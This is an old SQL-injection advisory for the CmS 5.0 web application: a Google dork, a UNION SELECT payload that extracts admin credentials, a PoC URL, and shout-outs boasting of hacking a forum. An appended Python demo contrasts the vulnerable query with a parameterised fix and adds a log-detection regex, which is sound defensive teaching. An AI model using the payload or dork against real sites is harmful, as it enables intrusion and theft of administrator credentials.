-----------------------------------------------------------------------
CmS (id) SQL Injection Vulnerability
-----------------------------------------------------------------------

Author : spykit
Site : http://devilzc0de.org/
Date : April, 22-2010
Location : Jakarta, Indonesia
Time Zone : GMT +7:00

----------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~

Application : CmS
Vendor : http://hotsweb.com
Price : free
Version : version 5.0
Google Dork: allinurl: Category.php?IndustrYID=

---------------------------------------------------------------

Exploitz:
~~~~~~~

union all select 1,2,concat_ws(0x3a,LoginID,Password,AdminEmail,AdminEmailPassword) from admin--

SQLi p0c:
~~~~~~~

http://127.0.0.1/[path]/category.php?IndustryID=[SQLI]

----------------------------------------------------------------

Shoutz:
~~~~

- 'oH lawd !! Malingsial lame forum g0t hacked for second times by Us,lulz...'
- LeQhi,lingah,GheMaX,v3n0m,m4rco,z0mb13,ast_boy,eidelweiss,xx_user,^pKi^,tian,zhie_o,JaLi-
- setanmuda,oche_an3h,onez,Joglo,d4rk_kn19ht,Cakill Schumbag
- kiddies,whitehat,c4uR,xtr0nic,adwisatya, and all member crew devilzc0de...
- hendri_note: stop sulking all the time, bro, act your age.. bruakkakaka
- #devilzc0de @irc.dal.net

----------------------------------------------------------------

Contact:
~~~~

spykit | devilzc0de CREW | daniel_sapuleka@yahoo.com
Homepage: http://devilzc0de.org

---------------------------[EOF]--------------------------------
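The Exploitz and SQLi p0c sections describe the classic pattern behind this advisory: the IndustryID query-string value is spliced straight into the SQL text, so a value carrying its own UNION becomes part of the statement. The example below is added here and is not code from the advisory or from the CmS vendor. It models category.php as two handlers, the vulnerable concatenation and the parameterised fix, runs the advisory's own payload against both, and adds a log-signature backstop for the PoC URL. Everything it assumes is constructed: the table layout (built only from the column names the payload references; the real CmS schema is not on the page), a Python stand-in for MySQL's CONCAT_WS so the MySQL payload parses under SQLite, and the two access-log lines.

```python
import re
import sqlite3
from urllib.parse import urlparse, parse_qs

# Payload exactly as given in the advisory's "Exploitz" section.
PAYLOAD = ("union all select 1,2,concat_ws(0x3a,LoginID,Password,"
           "AdminEmail,AdminEmailPassword) from admin--")


def _concat_ws(sep, *parts):
    """Stand-in for MySQL's CONCAT_WS so the payload parses under SQLite.
    SQLite reads 0x3a as the integer 58, so an integer separator is mapped
    to its character (':')."""
    sep = chr(sep) if isinstance(sep, int) else str(sep)
    return sep.join(str(p) for p in parts if p is not None)


def make_db():
    """Constructed in-memory database. The layout is an assumption built from
    the column names the payload references; it is not the real CmS schema."""
    con = sqlite3.connect(":memory:")
    con.create_function("concat_ws", -1, _concat_ws)
    con.executescript("""
        CREATE TABLE category (IndustryID INTEGER, Name TEXT, Description TEXT);
        CREATE TABLE admin (LoginID TEXT, Password TEXT,
                            AdminEmail TEXT, AdminEmailPassword TEXT);
        INSERT INTO category VALUES (1, 'Retail', 'Shops'), (2, 'Finance', 'Banks');
        INSERT INTO admin VALUES ('admin', 'hash-placeholder',
                                  'admin@example.invalid', 'mail-pw-placeholder');
    """)
    return con


def category_vulnerable(con, industry_id):
    """The bug class the advisory reports: the request value is spliced into
    SQL text, so whatever SQL it carries is executed as part of the query."""
    sql = ("SELECT IndustryID, Name, Description FROM category "
           "WHERE IndustryID=" + industry_id)
    return con.execute(sql).fetchall()


def category_hardened(con, industry_id):
    """Fix: validate the type, then bind the value as a parameter. The driver
    sends it as data, never as SQL, so its content cannot alter the query."""
    if not industry_id.isdigit():
        raise ValueError("IndustryID must be a positive integer")
    sql = ("SELECT IndustryID, Name, Description FROM category "
           "WHERE IndustryID=?")
    return con.execute(sql, (int(industry_id),)).fetchall()


def hardened_rejects(con, industry_id):
    """True when the hardened handler refuses the value instead of running it."""
    try:
        category_hardened(con, industry_id)
    except ValueError:
        return True
    return False


# Signature backstop for web-server logs: UNION ... SELECT or a trailing SQL
# comment inside a decoded query-string value. Detection complements the
# parameterised fix; it does not replace it, and it will miss encoded variants.
_SQLI_SIG = re.compile(r"\bunion\b.*\bselect\b|--", re.I | re.S)
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')


def suspicious_requests(log_lines):
    """Return (client_ip, parameter_name) pairs whose query values match."""
    hits = []
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        for name, values in parse_qs(urlparse(target).query).items():
            if any(_SQLI_SIG.search(v) for v in values):
                hits.append((ip, name))
    return hits


# Constructed log lines in combined-log format; the second carries the
# advisory's PoC URL with the payload percent-encoded as a browser sends it.
ACCESS_LOG = [
    '10.0.0.5 - - [22/Apr/2010:10:00:01 +0700] "GET /cms/category.php?IndustryID=3 HTTP/1.1" 200 5120',
    '10.0.0.9 - - [22/Apr/2010:10:00:07 +0700] "GET /cms/category.php?IndustryID=0%20'
    'union%20all%20select%201,2,concat_ws(0x3a,LoginID,Password,AdminEmail,'
    'AdminEmailPassword)%20from%20admin-- HTTP/1.1" 200 6010',
]

if __name__ == "__main__":
    con = make_db()
    # A leading value is needed for the spliced statement to parse; 0 matches no category.
    injected = "0 " + PAYLOAD
    print("vulnerable:", category_vulnerable(con, injected))
    print("hardened rejects payload:", hardened_rejects(con, injected))
    print("hardened  :", category_hardened(con, "1"))
    print("log hits  :", suspicious_requests(ACCESS_LOG))
```

Against the vulnerable handler the payload returns the admin row in place of a category row; the hardened handler never reaches the database because the value fails the integer check, and even a numeric-looking value is bound as data. The log scan flags only the second constructed line, which is the PoC URL.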